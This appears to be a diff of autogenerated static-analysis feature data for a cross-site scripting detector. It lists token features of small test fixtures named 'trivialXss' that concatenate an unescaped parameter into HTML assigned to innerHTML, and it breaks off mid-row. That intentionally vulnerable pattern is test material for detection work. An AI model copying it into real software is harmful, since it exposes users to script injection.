autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:29 | "" + s | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:29 | "" + s | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:41 | " ... /span>" | contextFunctionInterfaces | trivialXss(s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:41 | " ... /span>" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:18:2:41 | " ... /span>" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | @@ -22686,6 +150191,41 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:33:2:41 | "" | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:33:2:41 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:2:33:2:41 | "" | stringConcatenatedWith | '' + s -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:12 | document | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:12 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:12 | document | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:12 | document | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:12 | document | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:26 | documen ... elector | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:26 | documen ... elector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:26 | documen ... elector | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:26 | documen ... elector | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:26 | documen ... elector | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:35 | documen ... #html") | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:35 | documen ... #html") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:35 | documen ... #html") | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:35 | documen ... #html") | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:35 | documen ... #html") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:35 | exceptional return of documen ... #html") | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:35 | exceptional return of documen ... #html") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:35 | exceptional return of documen ... #html") | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:35 | exceptional return of documen ... #html") | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:35 | exceptional return of documen ... #html") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:45 | documen ... nerHTML | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:45 | documen ... nerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:45 | documen ... nerHTML | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:45 | documen ... nerHTML | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:45 | documen ... nerHTML | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:52 | documen ... = html | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:52 | documen ... = html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:52 | documen ... = html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:52 | documen ... = html | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:5:3:52 | documen ... = html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:14:3:26 | querySelector | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:14:3:26 | querySelector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:14:3:26 | querySelector | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:14:3:26 | querySelector | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:14:3:26 | querySelector | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:28:3:34 | "#html" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:28:3:34 | "#html" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:28:3:34 | "#html" | contextFunctionInterfaces | trivialXss(s) | @@ -22694,18 +150234,82 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:28:3:34 | "#html" | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:28:3:34 | "#html" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:28:3:34 | "#html" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:37:3:45 | innerHTML | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:37:3:45 | innerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:37:3:45 | innerHTML | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:37:3:45 | innerHTML | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:37:3:45 | innerHTML | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:49:3:52 | html | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:49:3:52 | html | contextFunctionInterfaces | trivialXss(s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:49:3:52 | html | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:49:3:52 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:49:3:52 | html | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/index.ts:3:49:3:52 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:1:1:0 | this | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:1:7 | this | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:1:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:1:7 | this | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:1:7 | this | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:1:7 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | 'arguments' object of function trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | 'arguments' object of function trivialXss | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | 'arguments' object of function trivialXss | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | 'arguments' object of function trivialXss | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | 'arguments' object of function trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | exceptional return of function trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | exceptional return of function trivialXss | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | exceptional return of function trivialXss | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | exceptional return of function trivialXss | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | exceptional return of function trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | functio ... html;\\n} | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | functio ... html;\\n} | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | return of function trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | return of function trivialXss | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | return of function trivialXss | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | return of function trivialXss | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:8:4:1 | return of function trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:17:1:26 | trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:17:1:26 | trivialXss | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:17:1:26 | trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:28:1:28 | s | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:28:1:28 | s | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:28:1:28 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:28:1:28 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:28:1:28 | s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:28:1:28 | s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:28:1:28 | s | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:28:1:28 | s | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:28:1:28 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:1:28:1:28 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:14 | html | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:14 | html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:14 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:14 | html | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:14 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:41 | html | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:41 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:41 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:41 | html | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:41 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:41 | html = ... /span>" | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:41 | html = ... /span>" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:41 | html = ... /span>" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:41 | html = ... /span>" | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:11:2:41 | html = ... /span>" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:25 | "" | contextFunctionInterfaces | trivialXss(s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:25 | "" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:25 | "" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:25 | "" | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:25 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:25 | "" | stringConcatenatedWith | -endpoint- s + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:29 | "" + s | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:29 | "" + s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:29 | "" + s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:29 | "" + s | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:29 | "" + s | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:41 | " ... /span>" | contextFunctionInterfaces | trivialXss(s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:41 | " ... /span>" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:18:2:41 | " ... /span>" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | @@ -22723,6 +150327,41 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:33:2:41 | "" | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:33:2:41 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:2:33:2:41 | "" | stringConcatenatedWith | '' + s -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:12 | document | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:12 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:12 | document | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:12 | document | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:12 | document | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:26 | documen ... elector | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:26 | documen ... elector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:26 | documen ... elector | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:26 | documen ... elector | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:26 | documen ... elector | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:35 | documen ... #html") | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:35 | documen ... #html") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:35 | documen ... #html") | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:35 | documen ... #html") | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:35 | documen ... #html") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:35 | exceptional return of documen ... #html") | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:35 | exceptional return of documen ... #html") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:35 | exceptional return of documen ... #html") | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:35 | exceptional return of documen ... #html") | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:35 | exceptional return of documen ... #html") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:45 | documen ... nerHTML | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:45 | documen ... nerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:45 | documen ... nerHTML | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:45 | documen ... nerHTML | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:45 | documen ... nerHTML | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:52 | documen ... = html | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:52 | documen ... = html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:52 | documen ... = html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:52 | documen ... = html | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:5:3:52 | documen ... = html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:14:3:26 | querySelector | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:14:3:26 | querySelector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:14:3:26 | querySelector | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:14:3:26 | querySelector | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:14:3:26 | querySelector | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:28:3:34 | "#html" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:28:3:34 | "#html" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:28:3:34 | "#html" | contextFunctionInterfaces | trivialXss(s) | @@ -22731,18 +150370,82 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:28:3:34 | "#html" | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:28:3:34 | "#html" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:28:3:34 | "#html" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:37:3:45 | innerHTML | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:37:3:45 | innerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:37:3:45 | innerHTML | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:37:3:45 | innerHTML | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:37:3:45 | innerHTML | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:49:3:52 | html | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:49:3:52 | html | contextFunctionInterfaces | trivialXss(s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:49:3:52 | html | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:49:3:52 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:49:3:52 | html | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib2/src/MyNode.ts:3:49:3:52 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:1:1:0 | this | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:1:7 | this | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:1:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:1:7 | this | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:1:7 | this | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:1:7 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | 'arguments' object of function trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | 'arguments' object of function trivialXss | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | 'arguments' object of function trivialXss | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | 'arguments' object of function trivialXss | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | 'arguments' object of function trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | exceptional return of function trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | exceptional return of function trivialXss | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | exceptional return of function trivialXss | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | exceptional return of function trivialXss | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | exceptional return of function trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | functio ... html;\\n} | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | functio ... html;\\n} | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | return of function trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | return of function trivialXss | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | return of function trivialXss | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | return of function trivialXss | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:8:4:1 | return of function trivialXss | fileImports | | +| 